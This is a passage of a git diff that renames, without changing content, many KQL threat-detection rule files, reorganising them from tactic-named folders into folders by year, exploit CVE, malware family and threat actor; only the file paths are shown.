b/KQL/rules-emerging-threats/2014/TA/Turla/turla_group_lateral_movement.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/turla_group_lateral_movement.kql rename to KQL/rules-emerging-threats/2014/TA/Turla/turla_group_lateral_movement.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/exploit_for_cve_2015_1641.kql b/KQL/rules-emerging-threats/2015/Exploits/CVE-2015-1641/exploit_for_cve_2015_1641.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/exploit_for_cve_2015_1641.kql rename to KQL/rules-emerging-threats/2015/Exploits/CVE-2015-1641/exploit_for_cve_2015_1641.kql diff --git a/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_0261.kql b/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-0261/exploit_for_cve_2017_0261.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_0261.kql rename to KQL/rules-emerging-threats/2017/Exploits/CVE-2017-0261/exploit_for_cve_2017_0261.kql diff --git a/KQL/rules-emerging-threats/Execution/droppers_exploiting_cve_2017_11882.kql b/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-11882/droppers_exploiting_cve_2017_11882.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/droppers_exploiting_cve_2017_11882.kql rename to KQL/rules-emerging-threats/2017/Exploits/CVE-2017-11882/droppers_exploiting_cve_2017_11882.kql diff --git a/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_8759.kql b/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-8759/exploit_for_cve_2017_8759.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_8759.kql rename to KQL/rules-emerging-threats/2017/Exploits/CVE-2017-8759/exploit_for_cve_2017_8759.kql diff --git a/KQL/rules-emerging-threats/Execution/adwind_rat_jrat.kql b/KQL/rules-emerging-threats/2017/Malware/Adwind-RAT/adwind_rat_jrat.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/adwind_rat_jrat.kql rename to KQL/rules-emerging-threats/2017/Malware/Adwind-RAT/adwind_rat_jrat.kql diff --git a/KQL/rules-emerging-threats/Execution/fireball_archer_install.kql b/KQL/rules-emerging-threats/2017/Malware/Fireball/fireball_archer_install.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/fireball_archer_install.kql rename to KQL/rules-emerging-threats/2017/Malware/Fireball/fireball_archer_install.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/notpetya_ransomware_activity.kql b/KQL/rules-emerging-threats/2017/Malware/NotPetya/notpetya_ransomware_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/notpetya_ransomware_activity.kql rename to KQL/rules-emerging-threats/2017/Malware/NotPetya/notpetya_ransomware_activity.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_plugx_activity.kql b/KQL/rules-emerging-threats/2017/Malware/PlugX/potential_plugx_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/potential_plugx_activity.kql rename to KQL/rules-emerging-threats/2017/Malware/PlugX/potential_plugx_activity.kql diff --git a/KQL/rules-emerging-threats/Lateral Movement/wannacry_ransomware_activity.kql b/KQL/rules-emerging-threats/2017/Malware/WannaCry/wannacry_ransomware_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Lateral Movement/wannacry_ransomware_activity.kql rename to KQL/rules-emerging-threats/2017/Malware/WannaCry/wannacry_ransomware_activity.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_apt10_cloud_hopper_activity.kql b/KQL/rules-emerging-threats/2017/TA/APT10/potential_apt10_cloud_hopper_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_apt10_cloud_hopper_activity.kql rename to KQL/rules-emerging-threats/2017/TA/APT10/potential_apt10_cloud_hopper_activity.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/ps_exe_renamed_sysinternals_tool.kql b/KQL/rules-emerging-threats/2017/TA/Dragonfly/ps_exe_renamed_sysinternals_tool.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/ps_exe_renamed_sysinternals_tool.kql rename to KQL/rules-emerging-threats/2017/TA/Dragonfly/ps_exe_renamed_sysinternals_tool.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/lazarus_system_binary_masquerading.kql b/KQL/rules-emerging-threats/2017/TA/Lazarus/lazarus_system_binary_masquerading.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/lazarus_system_binary_masquerading.kql rename to KQL/rules-emerging-threats/2017/TA/Lazarus/lazarus_system_binary_masquerading.kql diff --git a/KQL/rules-emerging-threats/Command and Control/pandemic_registry_key.kql b/KQL/rules-emerging-threats/2017/TA/Pandemic/pandemic_registry_key.kql similarity index 100% rename from KQL/rules-emerging-threats/Command and Control/pandemic_registry_key.kql rename to KQL/rules-emerging-threats/2017/TA/Pandemic/pandemic_registry_key.kql diff --git a/KQL/rules-emerging-threats/Execution/elise_backdoor_activity.kql b/KQL/rules-emerging-threats/2018/Malware/Elise-Backdoor/elise_backdoor_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/elise_backdoor_activity.kql rename to KQL/rules-emerging-threats/2018/Malware/Elise-Backdoor/elise_backdoor_activity.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/apt27_emissary_panda_activity.kql b/KQL/rules-emerging-threats/2018/TA/APT27/apt27_emissary_panda_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/apt27_emissary_panda_activity.kql rename to KQL/rules-emerging-threats/2018/TA/APT27/apt27_emissary_panda_activity.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/sofacy_trojan_loader_activity.kql b/KQL/rules-emerging-threats/2018/TA/APT28/sofacy_trojan_loader_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/sofacy_trojan_loader_activity.kql rename to KQL/rules-emerging-threats/2018/TA/APT28/sofacy_trojan_loader_activity.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_commandline_indicators.kql b/KQL/rules-emerging-threats/2018/TA/APT29-CozyBear/apt29_2018_phishing_campaign_commandline_indicators.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_commandline_indicators.kql rename to KQL/rules-emerging-threats/2018/TA/APT29-CozyBear/apt29_2018_phishing_campaign_commandline_indicators.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_file_indicators.kql b/KQL/rules-emerging-threats/2018/TA/APT29-CozyBear/apt29_2018_phishing_campaign_file_indicators.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_file_indicators.kql rename to KQL/rules-emerging-threats/2018/TA/APT29-CozyBear/apt29_2018_phishing_campaign_file_indicators.kql diff --git a/KQL/rules-emerging-threats/Persistence/oceanlotus_registry_activity.kql b/KQL/rules-emerging-threats/2018/TA/APT32-Oceanlotus/oceanlotus_registry_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/oceanlotus_registry_activity.kql rename to KQL/rules-emerging-threats/2018/TA/APT32-Oceanlotus/oceanlotus_registry_activity.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_muddywater_apt_activity.kql b/KQL/rules-emerging-threats/2018/TA/MuddyWater/potential_muddywater_apt_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_muddywater_apt_activity.kql rename to KQL/rules-emerging-threats/2018/TA/MuddyWater/potential_muddywater_apt_activity.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_activity.kql b/KQL/rules-emerging-threats/2018/TA/OilRig/oilrig_apt_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_activity.kql rename to KQL/rules-emerging-threats/2018/TA/OilRig/oilrig_apt_activity.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_registry_persistence.kql b/KQL/rules-emerging-threats/2018/TA/OilRig/oilrig_apt_registry_persistence.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_registry_persistence.kql rename to KQL/rules-emerging-threats/2018/TA/OilRig/oilrig_apt_registry_persistence.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/defrag_deactivation.kql b/KQL/rules-emerging-threats/2018/TA/Slingshot/defrag_deactivation.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/defrag_deactivation.kql rename to KQL/rules-emerging-threats/2018/TA/Slingshot/defrag_deactivation.kql diff --git a/KQL/rules-emerging-threats/Execution/tropictrooper_campaign_november_2018.kql b/KQL/rules-emerging-threats/2018/TA/TropicTrooper/tropictrooper_campaign_november_2018.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/tropictrooper_campaign_november_2018.kql rename to KQL/rules-emerging-threats/2018/TA/TropicTrooper/tropictrooper_campaign_november_2018.kql diff --git a/KQL/rules-emerging-threats/Persistence/potential_bearlpe_exploitation.kql b/KQL/rules-emerging-threats/2019/Exploits/BearLPE-Exploit/potential_bearlpe_exploitation.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/potential_bearlpe_exploitation.kql rename to KQL/rules-emerging-threats/2019/Exploits/BearLPE-Exploit/potential_bearlpe_exploitation.kql diff --git a/KQL/rules-emerging-threats/Persistence/exploiting_setupcomplete_cmd_cve_2019_1378.kql b/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-1378/exploiting_setupcomplete_cmd_cve_2019_1378.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/exploiting_setupcomplete_cmd_cve_2019_1378.kql rename to KQL/rules-emerging-threats/2019/Exploits/CVE-2019-1378/exploiting_setupcomplete_cmd_cve_2019_1378.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/exploiting_cve_2019_1388.kql b/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-1388/exploiting_cve_2019_1388.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/exploiting_cve_2019_1388.kql rename to KQL/rules-emerging-threats/2019/Exploits/CVE-2019-1388/exploiting_cve_2019_1388.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/sudo_privilege_escalation_cve_2019_14287.kql b/KQL/rules-emerging-threats/2019/Exploits/CVE-2019-14287/sudo_privilege_escalation_cve_2019_14287.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/sudo_privilege_escalation_cve_2019_14287.kql rename to KQL/rules-emerging-threats/2019/Exploits/CVE-2019-14287/sudo_privilege_escalation_cve_2019_14287.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_baby_shark_malware_activity.kql b/KQL/rules-emerging-threats/2019/Malware/BabyShark/potential_baby_shark_malware_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_baby_shark_malware_activity.kql rename to KQL/rules-emerging-threats/2019/Malware/BabyShark/potential_baby_shark_malware_activity.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_dridex_activity.kql b/KQL/rules-emerging-threats/2019/Malware/Dridex/potential_dridex_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_dridex_activity.kql rename to KQL/rules-emerging-threats/2019/Malware/Dridex/potential_dridex_activity.kql diff --git a/KQL/rules-emerging-threats/Impact/potential_dtrack_rat_activity.kql b/KQL/rules-emerging-threats/2019/Malware/Dtrack-RAT/potential_dtrack_rat_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Impact/potential_dtrack_rat_activity.kql rename to KQL/rules-emerging-threats/2019/Malware/Dtrack-RAT/potential_dtrack_rat_activity.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_emotet_activity.kql b/KQL/rules-emerging-threats/2019/Malware/Emotet/potential_emotet_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_emotet_activity.kql rename to KQL/rules-emerging-threats/2019/Malware/Emotet/potential_emotet_activity.kql diff --git a/KQL/rules-emerging-threats/Resource Development/formbook_process_creation.kql b/KQL/rules-emerging-threats/2019/Malware/Formbook/formbook_process_creation.kql similarity index 100% rename from KQL/rules-emerging-threats/Resource Development/formbook_process_creation.kql rename to KQL/rules-emerging-threats/2019/Malware/Formbook/formbook_process_creation.kql diff --git a/KQL/rules-emerging-threats/Impact/lockergoga_ransomware_activity.kql b/KQL/rules-emerging-threats/2019/Malware/LockerGoga/lockergoga_ransomware_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Impact/lockergoga_ransomware_activity.kql rename to KQL/rules-emerging-threats/2019/Malware/LockerGoga/lockergoga_ransomware_activity.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_qbot_activity.kql b/KQL/rules-emerging-threats/2019/Malware/QBot/potential_qbot_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_qbot_activity.kql rename to KQL/rules-emerging-threats/2019/Malware/QBot/potential_qbot_activity.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_ryuk_ransomware_activity.kql b/KQL/rules-emerging-threats/2019/Malware/Ryuk/potential_ryuk_ransomware_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/potential_ryuk_ransomware_activity.kql rename to KQL/rules-emerging-threats/2019/Malware/Ryuk/potential_ryuk_ransomware_activity.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_snatch_ransomware_activity.kql b/KQL/rules-emerging-threats/2019/Malware/Snatch/potential_snatch_ransomware_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_snatch_ransomware_activity.kql rename to KQL/rules-emerging-threats/2019/Malware/Snatch/potential_snatch_ransomware_activity.kql diff --git a/KQL/rules-emerging-threats/Persistence/potential_ursnif_malware_activity_registry.kql b/KQL/rules-emerging-threats/2019/Malware/Ursnif/potential_ursnif_malware_activity_registry.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/potential_ursnif_malware_activity_registry.kql rename to KQL/rules-emerging-threats/2019/Malware/Ursnif/potential_ursnif_malware_activity_registry.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql b/KQL/rules-emerging-threats/2019/TA/APC-C-12/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql rename to KQL/rules-emerging-threats/2019/TA/APC-C-12/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql diff --git a/KQL/rules-emerging-threats/Collection/apt31_judgement_panda_activity.kql b/KQL/rules-emerging-threats/2019/TA/APT31/apt31_judgement_panda_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Collection/apt31_judgement_panda_activity.kql rename to KQL/rules-emerging-threats/2019/TA/APT31/apt31_judgement_panda_activity.kql diff --git a/KQL/rules-emerging-threats/Credential Access/potential_russian_apt_credential_theft_activity.kql b/KQL/rules-emerging-threats/2019/TA/Bear-APT-Activity/potential_russian_apt_credential_theft_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Credential Access/potential_russian_apt_credential_theft_activity.kql rename to KQL/rules-emerging-threats/2019/TA/Bear-APT-Activity/potential_russian_apt_credential_theft_activity.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_empiremonkey_activity.kql b/KQL/rules-emerging-threats/2019/TA/EmpireMonkey/potential_empiremonkey_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_empiremonkey_activity.kql rename to KQL/rules-emerging-threats/2019/TA/EmpireMonkey/potential_empiremonkey_activity.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/equation_group_dll_u_export_function_load.kql b/KQL/rules-emerging-threats/2019/TA/EquationGroup/equation_group_dll_u_export_function_load.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/equation_group_dll_u_export_function_load.kql rename to KQL/rules-emerging-threats/2019/TA/EquationGroup/equation_group_dll_u_export_function_load.kql diff --git a/KQL/rules-emerging-threats/Resource Development/mustang_panda_dropper.kql b/KQL/rules-emerging-threats/2019/TA/MustangPanda/mustang_panda_dropper.kql similarity index 100% rename from KQL/rules-emerging-threats/Resource Development/mustang_panda_dropper.kql rename to KQL/rules-emerging-threats/2019/TA/MustangPanda/mustang_panda_dropper.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/operation_wocao_activity.kql b/KQL/rules-emerging-threats/2019/TA/Operation-Wocao/operation_wocao_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/operation_wocao_activity.kql rename to KQL/rules-emerging-threats/2019/TA/Operation-Wocao/operation_wocao_activity.kql diff --git a/KQL/rules-emerging-threats/Initial Access/exploited_cve_2020_10189_zoho_manageengine.kql b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-10189/exploited_cve_2020_10189_zoho_manageengine.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/exploited_cve_2020_10189_zoho_manageengine.kql rename to KQL/rules-emerging-threats/2020/Exploits/CVE-2020-10189/exploited_cve_2020_10189_zoho_manageengine.kql diff --git a/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1048/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql rename to KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1048/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql diff --git a/KQL/rules-emerging-threats/Persistence/suspicious_printerports_creation_cve_2020_1048_.kql b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1048/suspicious_printerports_creation_cve_2020_1048_.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/suspicious_printerports_creation_cve_2020_1048_.kql rename to KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1048/suspicious_printerports_creation_cve_2020_1048_.kql diff --git a/KQL/rules-emerging-threats/Initial Access/dns_rce_cve_2020_1350.kql b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1350/dns_rce_cve_2020_1350.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/dns_rce_cve_2020_1350.kql rename to KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1350/dns_rce_cve_2020_1350.kql diff --git a/KQL/rules-emerging-threats/Execution/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql b/KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1472/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql rename to KQL/rules-emerging-threats/2020/Exploits/CVE-2020-1472/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql diff --git a/KQL/rules-emerging-threats/Persistence/blue_mockingbird.kql b/KQL/rules-emerging-threats/2020/Malware/Blue-Mockingbird/blue_mockingbird.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/blue_mockingbird.kql rename to KQL/rules-emerging-threats/2020/Malware/Blue-Mockingbird/blue_mockingbird.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/blue_mockingbird_registry.kql b/KQL/rules-emerging-threats/2020/Malware/Blue-Mockingbird/blue_mockingbird_registry.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/blue_mockingbird_registry.kql rename to KQL/rules-emerging-threats/2020/Malware/Blue-Mockingbird/blue_mockingbird_registry.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_emotet_rundll32_execution.kql b/KQL/rules-emerging-threats/2020/Malware/Emotet/potential_emotet_rundll32_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_emotet_rundll32_execution.kql rename to KQL/rules-emerging-threats/2020/Malware/Emotet/potential_emotet_rundll32_execution.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql b/KQL/rules-emerging-threats/2020/Malware/FlowCloud/flowcloud_registry_markers.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql rename to KQL/rules-emerging-threats/2020/Malware/FlowCloud/flowcloud_registry_markers.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_ke3chang_tidepool_malware_activity.kql b/KQL/rules-emerging-threats/2020/Malware/Ke3chang-TidePool/potential_ke3chang_tidepool_malware_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_ke3chang_tidepool_malware_activity.kql rename to KQL/rules-emerging-threats/2020/Malware/Ke3chang-TidePool/potential_ke3chang_tidepool_malware_activity.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_maze_ransomware_activity.kql b/KQL/rules-emerging-threats/2020/Malware/Maze/potential_maze_ransomware_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_maze_ransomware_activity.kql rename to KQL/rules-emerging-threats/2020/Malware/Maze/potential_maze_ransomware_activity.kql diff --git a/KQL/rules-emerging-threats/Execution/trickbot_malware_activity.kql b/KQL/rules-emerging-threats/2020/Malware/Trickbot/trickbot_malware_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/trickbot_malware_activity.kql rename to KQL/rules-emerging-threats/2020/Malware/Trickbot/trickbot_malware_activity.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql b/KQL/rules-emerging-threats/2020/TA/Evilnum/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql rename to KQL/rules-emerging-threats/2020/TA/Evilnum/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql diff --git a/KQL/rules-emerging-threats/Credential Access/gallium_iocs.kql b/KQL/rules-emerging-threats/2020/TA/GALLIUM/gallium_iocs.kql similarity index 100% rename from KQL/rules-emerging-threats/Credential Access/gallium_iocs.kql rename to KQL/rules-emerging-threats/2020/TA/GALLIUM/gallium_iocs.kql diff --git a/KQL/rules-emerging-threats/Execution/greenbug_espionage_group_indicators.kql b/KQL/rules-emerging-threats/2020/TA/Greenbug/greenbug_espionage_group_indicators.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/greenbug_espionage_group_indicators.kql rename to KQL/rules-emerging-threats/2020/TA/Greenbug/greenbug_espionage_group_indicators.kql diff --git a/KQL/rules-emerging-threats/Execution/lazarus_group_activity.kql b/KQL/rules-emerging-threats/2020/TA/Lazarus/lazarus_group_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/lazarus_group_activity.kql rename to KQL/rules-emerging-threats/2020/TA/Lazarus/lazarus_group_activity.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/leviathan_registry_key_activity.kql b/KQL/rules-emerging-threats/2020/TA/Leviathan/leviathan_registry_key_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/leviathan_registry_key_activity.kql rename to KQL/rules-emerging-threats/2020/TA/Leviathan/leviathan_registry_key_activity.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/suspicious_vbscript_un2452_pattern.kql b/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/suspicious_vbscript_un2452_pattern.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/suspicious_vbscript_un2452_pattern.kql rename to KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/suspicious_vbscript_un2452_pattern.kql diff --git a/KQL/rules-emerging-threats/Execution/unc2452_powershell_pattern.kql b/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/unc2452_powershell_pattern.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/unc2452_powershell_pattern.kql rename to KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/unc2452_powershell_pattern.kql diff --git a/KQL/rules-emerging-threats/Execution/unc2452_process_creation_patterns.kql b/KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/unc2452_process_creation_patterns.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/unc2452_process_creation_patterns.kql rename to KQL/rules-emerging-threats/2020/TA/SolarWinds-Supply-Chain/unc2452_process_creation_patterns.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/taidoor_rat_dll_load.kql b/KQL/rules-emerging-threats/2020/TA/TAIDOOR-RAT/taidoor_rat_dll_load.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/taidoor_rat_dll_load.kql rename to KQL/rules-emerging-threats/2020/TA/TAIDOOR-RAT/taidoor_rat_dll_load.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/winnti_malware_hk_university_campaign.kql b/KQL/rules-emerging-threats/2020/TA/Winnti/winnti_malware_hk_university_campaign.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/winnti_malware_hk_university_campaign.kql rename to KQL/rules-emerging-threats/2020/TA/Winnti/winnti_malware_hk_university_campaign.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/winnti_pipemon_characteristics.kql b/KQL/rules-emerging-threats/2020/TA/Winnti/winnti_pipemon_characteristics.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/winnti_pipemon_characteristics.kql rename to KQL/rules-emerging-threats/2020/TA/Winnti/winnti_pipemon_characteristics.kql diff --git a/KQL/rules-emerging-threats/Execution/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql diff --git a/KQL/rules-emerging-threats/Persistence/potential_printnightmare_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/potential_printnightmare_exploitation_attempt.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/potential_printnightmare_exploitation_attempt.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/potential_printnightmare_exploitation_attempt.kql diff --git a/KQL/rules-emerging-threats/Execution/printernightmare_mimikatz_driver_name.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/printernightmare_mimikatz_driver_name.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/printernightmare_mimikatz_driver_name.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/printernightmare_mimikatz_driver_name.kql diff --git a/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/windows_spooler_service_suspicious_binary_load.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/windows_spooler_service_suspicious_binary_load.kql diff --git a/KQL/rules-emerging-threats/Initial Access/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26084/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26084/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2021_26857_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26857/potential_cve_2021_26857_exploitation_attempt.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_cve_2021_26857_exploitation_attempt.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26857/potential_cve_2021_26857_exploitation_attempt.kql diff --git a/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26858/cve_2021_26858_exchange_exploitation.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26858/cve_2021_26858_exchange_exploitation.kql diff --git a/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-33771/cve_2021_31979_cve_2021_33771_exploits.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-33771/cve_2021_31979_cve_2021_33771_exploits.kql diff --git a/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-33771/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-33771/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql diff --git a/KQL/rules-emerging-threats/Persistence/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql 